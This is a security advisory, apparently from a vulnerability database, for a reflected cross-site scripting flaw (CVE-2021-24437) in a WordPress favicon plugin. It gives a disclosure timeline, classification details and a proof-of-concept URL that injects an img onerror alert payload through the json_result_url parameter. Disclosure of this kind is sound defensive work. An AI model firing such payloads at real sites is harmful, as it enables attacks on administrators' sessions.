Favicon by RealFaviconGenerator < 1.3.22 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24437 | Plugin Vulnerabilities

Description

The plugin does not sanitise or escape one of its parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting (XSS) which is executed in the context of a logged administrator.

Timeline (WPScanTeam):
June 28th, 2021 - Details sent to vendor
July 9th, 2021 - Escalated to WP due to lack of response from vendor
July 27th, 2021 - No update, disclosing
August 9th, 2021 - v1.3.22 released, fixing the issue

Proof of Concept

Affected parameter: json_result_url

https://example.com/wp-admin/themes.php?page=favicon-by-realfavicongenerator%2Fadmin%2Fclass-favicon-by-realfavicongenerator-admin.phpfavicon_appearance_menu&json_result_url=%3Cimg%20src=x%20onerror=alert(document.domain)%3E

Affects Plugins

favicon-by-realfavicongenerator

Fixed in 1.3.22

References

CVE

URL

https://wordpress.org/support/topic/wp-engine-security-plugin-vulnerability-notification/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

renniepak

Submitter

renniepak

Submitter twitter

Verified

Yes

WPVDB ID

ed9d26be-cc96-4274-a05b-0b7ad9d8cfd9

Timeline

Publicly Published

2021-07-27 (about 4 years ago)

Added

2021-07-27 (about 4 years ago)

Last Updated

2021-08-10 (about 4 years ago)

Other

Published

Title

Published

2025-03-18

Title

RWS Enquiry And Lead Follow-up <= 1.0 - Reflected Cross-Site Scripting

Published

2021-08-25

Title

Contact Form 7 Zoho < 1.1.8 - Reflected Cross-Site Scripting

Published

2024-02-19

Title

Password Protected < 2.6.7 - Admin+ Stored XSS

Published

2022-11-27

Title

Download Manager < 3.2.60 - Reflected XSS

Published

2024-07-09

Title

WP Ajax Contact Form <= 2.2.2 - Reflected Cross-Site Scripting